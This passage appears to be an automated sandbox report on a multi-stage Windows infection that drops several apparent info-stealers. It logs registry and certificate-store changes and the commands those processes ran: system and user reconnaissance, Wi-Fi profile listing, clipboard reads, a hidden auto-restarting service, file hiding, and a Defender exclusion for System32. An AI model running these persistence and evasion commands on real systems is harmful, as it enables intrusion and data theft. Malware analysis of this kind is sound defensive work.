| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3169499791-3545231813-3156325206-1000\{D851ACE9-42E4-46EC-9EB0-B15D6F4D181C} | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 | C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = (binary certificate blob, not reproduced here) | C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1000016001\b22e0b08f0.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe
"C:\Users\Admin\AppData\Local\Temp\d6105747d3d97f0202125567f82b2e04ae696dd101582fc288d69800abdf32eb.exe"
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
"C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe"
C:\Users\Admin\1000015002\5abc5821d6.exe
"C:\Users\Admin\1000015002\5abc5821d6.exe"
C:\Users\Admin\AppData\Local\Temp\1000016001\b22e0b08f0.exe
"C:\Users\Admin\AppData\Local\Temp\1000016001\b22e0b08f0.exe"
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
"C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\1000017001\f2e8263483.exe
"C:\Users\Admin\AppData\Local\Temp\1000017001\f2e8263483.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/account
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa0254ab58,0x7ffa0254ab68,0x7ffa0254ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1644 --field-trial-handle=1884,i,5821116115084751294,7424518065302705047,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1884,i,5821116115084751294,7424518065302705047,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2244 --field-trial-handle=1884,i,5821116115084751294,7424518065302705047,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3060 --field-trial-handle=1884,i,5821116115084751294,7424518065302705047,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3068 --field-trial-handle=1884,i,5821116115084751294,7424518065302705047,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3580 --field-trial-handle=1884,i,5821116115084751294,7424518065302705047,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=4456 --field-trial-handle=1884,i,5821116115084751294,7424518065302705047,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4676 --field-trial-handle=1884,i,5821116115084751294,7424518065302705047,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4688 --field-trial-handle=1884,i,5821116115084751294,7424518065302705047,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 --field-trial-handle=1884,i,5821116115084751294,7424518065302705047,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5196 --field-trial-handle=1884,i,5821116115084751294,7424518065302705047,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5248 --field-trial-handle=1884,i,5821116115084751294,7424518065302705047,131072 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_1476_133631872887631708\stub.exe
"C:\Users\Admin\AppData\Local\Temp\1000005001\judit.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe""
C:\Windows\system32\attrib.exe
attrib +h +s "C:\Users\Admin\AppData\Local\MonsterUpdateService\Monster.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('%error_message%', 0, 'System Error', 0+16);close()""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "taskkill /F /IM chrome.exe"
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Users\Admin\AppData\Local\Temp\1000007001\redline123123.exe
"C:\Users\Admin\AppData\Local\Temp\1000007001\redline123123.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "chcp"
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Get-Clipboard
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\chcp.com
chcp
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe
"C:\Users\Admin\AppData\Local\Temp\1000008001\upd.exe"
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe"
C:\Users\Admin\AppData\Roaming\configurationValue\One.exe
"C:\Users\Admin\AppData\Roaming\configurationValue\One.exe"
C:\Users\Admin\AppData\Local\Temp\1000025001\setup222.exe
"C:\Users\Admin\AppData\Local\Temp\1000025001\setup222.exe"
C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe
"C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\system32\HOSTNAME.EXE
hostname
C:\Windows\System32\Wbem\WMIC.exe
wmic logicaldisk get caption,description,providername
C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe
"C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"
C:\Windows\system32\net.exe
net user
C:\Users\Admin\AppData\Local\Temp\SetupWizard.exe
SetupWizard.exe
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user
C:\Users\Admin\AppData\Local\Temp\SetupWizard-2f530882fcd058c0\SetupWizard.exe
"C:\Users\Admin\AppData\Local\Temp\SetupWizard-2f530882fcd058c0\SetupWizard.exe"
C:\Windows\system32\query.exe
query user
C:\Windows\system32\quser.exe
"C:\Windows\system32\quser.exe"
C:\Windows\system32\net.exe
net localgroup
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup
C:\Windows\system32\net.exe
net localgroup administrators
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup administrators
C:\Windows\system32\net.exe
net user guest
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user guest
C:\Windows\system32\net.exe
net user administrator
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user administrator
C:\Windows\System32\Wbem\WMIC.exe
wmic startup get caption,command
C:\Windows\system32\tasklist.exe
tasklist /svc
C:\Windows\system32\ipconfig.exe
ipconfig /all
C:\Users\Admin\AppData\Local\Temp\1000063001\drivermanager.exe
"C:\Users\Admin\AppData\Local\Temp\1000063001\drivermanager.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\system32\ROUTE.EXE
route print
C:\Windows\system32\ARP.EXE
arp -a
C:\Windows\system32\NETSTAT.EXE
netstat -ano
C:\Windows\system32\sc.exe
sc query type= service state= all
C:\Windows\system32\netsh.exe
netsh firewall show state
C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe
"C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"
C:\Windows\system32\netsh.exe
netsh firewall show config
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
"C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe
"C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe"
C:\Users\Admin\AppData\Local\Temp\onefile_2424_133631873216797754\stub.exe
"C:\Users\Admin\AppData\Local\Temp\1000070001\monster.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Users\Admin\AppData\Local\Temp\1000073001\bin.exe
"C:\Users\Admin\AppData\Local\Temp\1000073001\bin.exe"
C:\Windows\system32\winsvc.exe
"C:\Windows\system32\winsvc.exe" "C:\Users\Admin\AppData\Local\Temp\SetupWizard-2f530882fcd058c0\SetupWizard.exe"
C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe
"C:\Users\Admin\AppData\Local\Temp\1000075001\legs.exe"
C:\Users\Admin\AppData\Local\Temp\5641a448ac\Hkbsse.exe
"C:\Users\Admin\AppData\Local\Temp\5641a448ac\Hkbsse.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3900 -ip 3900
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3900 -s 240
C:\Users\Admin\AppData\Local\Temp\5641a448ac\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\5641a448ac\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "create" "winsvc" "type=own" "start=auto" "error=ignore" "binPath=\"C:\Windows\system32\winsvc.exe\"" "DisplayName=\"Windows System Service\""
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" create winsvc type=own start=auto error=ignore binPath=C:\Windows\system32\winsvc.exe "DisplayName=Windows System Service"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "failure" "winsvc" "reset=0" "actions=restart/0/restart/0/restart/0"
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" failure winsvc reset=0 actions=restart/0/restart/0/restart/0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "description" "winsvc" "\"Windows System Service is the main system supervision service.\""
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" description winsvc "Windows System Service is the main system supervision service."
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "start" "winsvc"
C:\Windows\system32\sc.exe
"C:\Windows\system32\sc.exe" start winsvc
C:\Windows\system32\winsvc.exe
C:\Windows\system32\winsvc.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\system32\""
